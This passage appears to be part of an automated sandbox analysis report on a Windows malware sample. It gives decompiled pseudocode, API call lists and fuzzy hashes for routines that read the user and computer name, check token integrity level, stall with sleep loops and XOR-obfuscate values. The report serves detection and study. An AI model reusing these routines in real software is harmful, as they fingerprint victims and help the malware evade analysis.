                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04616410
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04615488), ref: 04616431
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04615488,?), ref: 04616439
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: dc4ca77e1cac95706672dbc57d89773c476b558954b0420cbb68cf5d3268d219
                                • Instruction ID: 03bc4351a7295014eede3e70271f4459df3918d7446194bf9929bb185f440d55
                                • Opcode Fuzzy Hash: dc4ca77e1cac95706672dbc57d89773c476b558954b0420cbb68cf5d3268d219
                                • Instruction Fuzzy Hash: 4021C3B6A00224BBD711DFA4DC05F9D77A9EB44751F288126F905E72A0FA70AA05CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046153F2, Relevance: 10.7, APIs: 7, Instructions: 191memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E046153F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E046158F8();
				if(_t27 != 0) {
					_t77 =  *0x461a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x461a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x461a148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E0461696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x461a2d4; // 0xdad5a8
					_push(0x461a2fc);
					_push(1);
					_t7 = _t32 + 0x461b5ad; // 0x4d283a53
					 *0x461a2f8 = 0xc;
					 *0x461a300 = 0;
					L04614AF8();
					_t36 = E04616384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E04614454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E04616837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x461a2d4; // 0xdad5a8
								_t18 = _t64 + 0x461b84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x461a32c = _t87;
						}
						_t38 = E046160E1();
						 *0x461a2c8 =  *0x461a2c8 ^ 0xe8fa7dd7;
						 *0x461a31c = _t38;
						_t39 = E04616837(0x60);
						__eflags = _t39;
						 *0x461a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x461a37c; // 0x53c9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x461a37c; // 0x53c9630
							 *_t56 = 0x461b83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x461a290, _t84, 0x43);
							__eflags = _t42;
							 *0x461a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x461a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x461a2d4; // 0xdad5a8
								_t19 = _t76 + 0x461b53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x46192a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E04614454( ~_v8 &  *0x461a2c8, 0x461a00c); // executed
								_t84 = E04612206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E04611376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E04612022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E04612439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x461a14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E04616BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}






































                                0x046153f2
                                0x046153fd
                                0x04615400
                                0x04615403
                                0x04615406
                                0x0461540d
                                0x0461540f
                                0x0461541b
                                0x0461541d
                                0x0461541d
                                0x04615426
                                0x0461542e
                                0x04615431
                                0x0461544b
                                0x04615450
                                0x04615451
                                0x04615453
                                0x04615458
                                0x0461545d
                                0x0461545f
                                0x04615466
                                0x04615470
                                0x04615476
                                0x04615483
                                0x0461548a
                                0x0461548f
                                0x0461548f
                                0x04615498
                                0x046154c1
                                0x046154c4
                                0x046154d1
                                0x046154d8
                                0x046154e4
                                0x046154e6
                                0x046154e8
                                0x046154ed
                                0x046154f3
                                0x046154f9
                                0x046154ff
                                0x04615502
                                0x04615507
                                0x0461550f
                                0x04615511
                                0x04615511
                                0x04615514
                                0x04615514
                                0x0461551a
                                0x0461551f
                                0x04615527
                                0x0461552c
                                0x04615531
                                0x04615533
                                0x04615538
                                0x04615567
                                0x0461553a
                                0x0461553f
                                0x04615544
                                0x04615549
                                0x04615550
                                0x04615556
                                0x0461555b
                                0x04615561
                                0x04615561
                                0x04615568
                                0x0461556a
                                0x04615579
                                0x0461557f
                                0x04615581
                                0x04615586
                                0x046155b2
                                0x04615588
                                0x04615588
                                0x0461558e
                                0x0461559b
                                0x046155a1
                                0x046155a1
                                0x046155a9
                                0x046155ab
                                0x046155b3
                                0x046155b5
                                0x046155bc
                                0x046155c9
                                0x046155d3
                                0x046155d5
                                0x046155d7
                                0x00000000
                                0x00000000
                                0x046155d9
                                0x046155de
                                0x046155e0
                                0x046155e7
                                0x046155eb
                                0x046155ee
                                0x04615603
                                0x04615607
                                0x0461560c
                                0x00000000
                                0x0461560c
                                0x046155f0
                                0x046155f2
                                0x00000000
                                0x00000000
                                0x046155f4
                                0x046155fd
                                0x046155ff
                                0x04615601
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04615601
                                0x046155e4
                                0x046155e4
                                0x046155b5
                                0x0461549a
                                0x0461549a
                                0x0461549f
                                0x0461560e
                                0x04615612
                                0x0461561a
                                0x0461561a
                                0x00000000
                                0x04615612
                                0x046154a5
                                0x046154a8
                                0x046154a8
                                0x046154aa
                                0x046154ad
                                0x046154b5
                                0x046154bc
                                0x00000000
                                0x04615622
                                0x04615622
                                0x04615625
                                0x0461562a
                                0x0461562a

                                APIs
                                  • Part of subcall function 046158F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,0461540B,00000000,00000000,00000000,?,?,?,?,?,04616BD8,?,00000001), ref: 04615907
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0461A2FC,00000000), ref: 04615476
                                • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,04616BD8,?,00000001), ref: 0461548F
                                • wsprintfA.USER32 ref: 0461550F
                                • memset.NTDLL ref: 0461553F
                                • RtlInitializeCriticalSection.NTDLL(053C95F0), ref: 04615550
                                • RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 04615579
                                • wsprintfA.USER32 ref: 046155A9
                                  • Part of subcall function 04614454: GetUserNameW.ADVAPI32(00000000,046155CE), ref: 0461448B
                                  • Part of subcall function 04614454: RtlAllocateHeap.NTDLL(00000000,046155CE), ref: 046144A2
                                  • Part of subcall function 04614454: GetUserNameW.ADVAPI32(00000000,046155CE), ref: 046144AF
                                  • Part of subcall function 04614454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,046155CE,?,?,?,?,?,04616BD8,?,00000001), ref: 046144D0
                                  • Part of subcall function 04614454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 046144F7
                                  • Part of subcall function 04614454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0461450B
                                  • Part of subcall function 04614454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04614518
                                  • Part of subcall function 04614454: HeapFree.KERNEL32(00000000,00000000), ref: 04614536
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                • String ID:
                                • API String ID: 2910951584-0
                                • Opcode ID: 3039eb8453fcad7ed8e338111d07c69dc95e822072e714d1e5a00fc8e7efdbf3
                                • Instruction ID: 4677e4790d622daa7e16563a324faec4c5d21a0ddea463348ff17e76a0f5d9d1
                                • Opcode Fuzzy Hash: 3039eb8453fcad7ed8e338111d07c69dc95e822072e714d1e5a00fc8e7efdbf3
                                • Instruction Fuzzy Hash: 6551C371A01225ABEB11DFA4D844BAEB3B8EB84755F1C0116E806E7270FB78FD40CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0461113D, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0461113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x461a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04616837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E046150CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                0x0461114a
                                0x04611151
                                0x04611158
                                0x0461116c
                                0x04611177
                                0x0461118f
                                0x0461119c
                                0x0461119f
                                0x046111a4
                                0x046111af
                                0x046111b3
                                0x046111c2
                                0x046111c6
                                0x046111e2
                                0x046111e2
                                0x046111e6
                                0x046111e6
                                0x046111eb
                                0x046111ef
                                0x046111f5
                                0x046111f6
                                0x046111fd
                                0x04611203

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0461116F
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 0461118F
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0461119F
                                • CloseHandle.KERNEL32(00000000), ref: 046111EF
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 046111C2
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 046111CA
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 046111DA
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 98fa92c3defa8bbc4e069b501777553bbc2aa31abddac34c5dbf4dd010b94dba
                                • Instruction ID: 2f8fe4fb4528c4572d00f59f5a535a2b67a6a0732bb58f05c2e3cefc8a7af316
                                • Opcode Fuzzy Hash: 98fa92c3defa8bbc4e069b501777553bbc2aa31abddac34c5dbf4dd010b94dba
                                • Instruction Fuzzy Hash: CF215C75900209FFEB019FD1CC44EEEBBB8EB09304F0440A6E611A6261E7759F44EB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04616B0F, Relevance: 10.6, APIs: 7, Instructions: 72sleepmemorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E04616B0F(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x461a290 = _t14;
				if(_t14 != 0) {
					 *0x461a180 = GetTickCount();
					_t16 = E04614C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L04617EEA();
						_t40 = _t18 + _t20;
						_t22 = E0461414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x461a2ac; // 0x300
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x461a2b8 = 1; // executed
						}
					}
					_t16 = E046153F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















                                0x04616b0f
                                0x04616b24
                                0x04616b2c
                                0x04616b31
                                0x04616b44
                                0x04616b49
                                0x04616b50
                                0x04616bd8
                                0x04616bde
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04616b56
                                0x04616b56
                                0x04616b5b
                                0x04616b61
                                0x04616b67
                                0x04616b71
                                0x04616b75
                                0x04616b76
                                0x04616b7b
                                0x04616b7c
                                0x04616b7d
                                0x04616b82
                                0x04616b88
                                0x04616b91
                                0x04616b97
                                0x04616b9d
                                0x04616ba2
                                0x04616ba9
                                0x04616bad
                                0x04616bb5
                                0x04616bbd
                                0x04616bbf
                                0x04616bbf
                                0x04616bc7
                                0x04616bc9
                                0x04616bc9
                                0x04616bc7
                                0x04616bd3
                                0x00000000
                                0x04616bd3
                                0x04616b35
                                0x00000000

                                APIs
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04616B24
                                • GetTickCount.KERNEL32 ref: 04616B3B
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 04616B5B
                                • SwitchToThread.KERNEL32(?,00000001), ref: 04616B61
                                • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04616B7D
                                • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 04616B97
                                • IsWow64Process.KERNEL32(00000300,?,?,00000001), ref: 04616BB5
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                • String ID:
                                • API String ID: 3690864001-0
                                • Opcode ID: eca25aa6b40d3a1b267fcf326e6780a5c4198851d6f46b3a744441c5f12d58c9
                                • Instruction ID: 80e67bb455a7ca6aef846ca00f06c00c3baa0f2066752c9c4ded0a6a96ca163e
                                • Opcode Fuzzy Hash: eca25aa6b40d3a1b267fcf326e6780a5c4198851d6f46b3a744441c5f12d58c9
                                • Instruction Fuzzy Hash: B421E7B2A04214AFD7109FB4D899E6A77E8E744355F0C492EF509C7260F778EC08CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0461624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E0461624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x461a2d4; // 0xdad5a8
				_t1 = _t9 + 0x461b60c; // 0x253d7325
				_t36 = 0;
				_t28 = E0461278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x53c9631
					_t40 = E04616837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E046149FE(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E046150CA(_t40);
						_t42 = E04617565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E046150CA(_t36);
							_t36 = _t42;
						}
						_t43 = E046152E5(_t36, _t33);
						if(_t43 != 0) {
							E046150CA(_t36);
							_t36 = _t43;
						}
					}
					E046150CA(_t28);
				}
				return _t36;
			}
















                                0x0461624d
                                0x04616250
                                0x04616251
                                0x04616258
                                0x0461625f
                                0x04616266
                                0x0461626a
                                0x04616271
                                0x04616278
                                0x0461627d
                                0x04616285
                                0x0461628f
                                0x04616293
                                0x04616297
                                0x0461629d
                                0x046162a2
                                0x046162ac
                                0x046162b2
                                0x046162b4
                                0x046162cb
                                0x046162cf
                                0x046162d2
                                0x046162d7
                                0x046162d7
                                0x046162e0
                                0x046162e4
                                0x046162e7
                                0x046162ec
                                0x046162ec
                                0x046162e4
                                0x046162ef
                                0x046162f4
                                0x046162fa

                                APIs
                                  • Part of subcall function 0461278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04616266,253D7325,00000000,00000000,?,00000000,046170D9), ref: 046127F3
                                  • Part of subcall function 0461278C: sprintf.NTDLL ref: 04612814
                                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616278
                                • lstrlen.KERNEL32(00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616280
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • strcpy.NTDLL ref: 04616297
                                • lstrcat.KERNEL32(00000000,00000000), ref: 046162A2
                                  • Part of subcall function 046149FE: lstrlen.KERNEL32(00000000,00000000,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 04614A0F
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 046162BF
                                  • Part of subcall function 04617565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,046162CB,00000000,?,00000000,046170D9,00000000,053C9630), ref: 0461756F
                                  • Part of subcall function 04617565: _snprintf.NTDLL ref: 046175CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: df3c0011f6cd91c2a7f1df9ad673960e012a6ae413207d4b56ce0dd9ea4c481c
                                • Instruction ID: 937221efc8403f334fa0b43fea4fdf4e051b04017bb0dd015697ce334a6591d8
                                • Opcode Fuzzy Hash: df3c0011f6cd91c2a7f1df9ad673960e012a6ae413207d4b56ce0dd9ea4c481c
                                • Instruction Fuzzy Hash: 5711E077A01225775712ABB88C44C6E76ADDF85A2930D405AF901E7220FF78EC0287E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0461161A, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 0461165B
                                • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 046116DD
                                • StrStrIW.SHLWAPI(00000000,006E0069), ref: 0461171C
                                • SysFreeString.OLEAUT32(00000000), ref: 0461173E
                                  • Part of subcall function 04616C6D: SysAllocString.OLEAUT32(046192B0), ref: 04616CBD
                                • SafeArrayDestroy.OLEAUT32(?), ref: 04611792
                                • SysFreeString.OLEAUT32(?), ref: 046117A0
                                  • Part of subcall function 04611FC2: Sleep.KERNELBASE(000001F4), ref: 0461200A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                • String ID:
                                • API String ID: 2118684380-0
                                • Opcode ID: a82bab1c6ff5a3cd55feb7b18490a54bc3abdfe69a0dd887ec083511b56f50be
                                • Instruction ID: cdacfe9a1cfe08788aa92743df701b704209cdda693743313c8258bcc3968fc3
                                • Opcode Fuzzy Hash: a82bab1c6ff5a3cd55feb7b18490a54bc3abdfe69a0dd887ec083511b56f50be
                                • Instruction Fuzzy Hash: 17510176900649EFDB10DFE8C8848EEB7B6FF89344B198869E605DB320E735AD45CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04612902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 04611206: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,053C89A0,04612932,?,?,?,?,?,?,?,?,?,?,?,04612932), ref: 046112D2
                                  • Part of subcall function 046143C0: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 046143FD
                                  • Part of subcall function 046143C0: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 0461442E
                                • SysAllocString.OLEAUT32(?), ref: 0461295E
                                • SysAllocString.OLEAUT32(0070006F), ref: 04612972
                                • SysAllocString.OLEAUT32(00000000), ref: 04612984
                                • SysFreeString.OLEAUT32(00000000), ref: 046129E8
                                • SysFreeString.OLEAUT32(00000000), ref: 046129F7
                                • SysFreeString.OLEAUT32(00000000), ref: 04612A02
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                • String ID:
                                • API String ID: 2831207796-0
                                • Opcode ID: 8ef72084d9e1c3644c101e83c25a27a6d13cf1d7fa8f2029d12fddf27be1cd21
                                • Instruction ID: 1eb8127c0235603903119e900f73f5fc15fb509b1555eafe17a1e69e43f1c359
                                • Opcode Fuzzy Hash: 8ef72084d9e1c3644c101e83c25a27a6d13cf1d7fa8f2029d12fddf27be1cd21
                                • Instruction Fuzzy Hash: D5315E32D00609AFDB01DFADD844A9FB7B6AF49311F18446AED10FB220EB75AD05CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04611D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E04611D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x461a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04614AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E04617702(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E046150CA(_a8);
						goto L29;
					}
					_t64 =  *0x461a2cc; // 0x53c9c98
					_t16 = _t64 + 0xc; // 0x53c9d8c
					_t65 = E04614AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d046190, executed
						_t67 = E04615F2A(_t97,  *_t33, _t91, _a8,  *0x461a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x461a2d4; // 0xdad5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x461b9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x461b9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E04615927(_t69,  *0x461a384,  *0x461a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x461a2d4; // 0xdad5a8
									_t44 = _t71 + 0x461b86a; // 0x74666f53
									_t73 = E04614AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d046190
										E04611F7A( *_t47, _t91, _a8,  *0x461a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d046190
										E04611F7A( *_t49, _t91, _t99,  *0x461a380, _a16);
										E046150CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d046190, executed
